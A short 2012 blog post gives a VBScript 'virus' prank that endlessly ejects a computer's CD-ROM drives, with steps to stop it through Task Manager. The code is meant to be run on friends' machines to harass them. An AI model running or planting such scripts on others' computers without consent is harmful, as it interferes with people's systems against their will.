Pages

Friday, November 2, 2012

Prank your friends by opening and closing his CD-ROM


Hi friends! this may really harass your friends.
It is a virus which will open and close CD-ROM continuously

.Open notepad type the following code and save it as funnyvirus.vbs 

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


So how to stop it,

Go to task manager by pressing Ctrl+Alt+Delete 

or by typing taskmgr in run. 



Go to Processes tab, look for wscript.exe and End Process.

No comments:

Post a Comment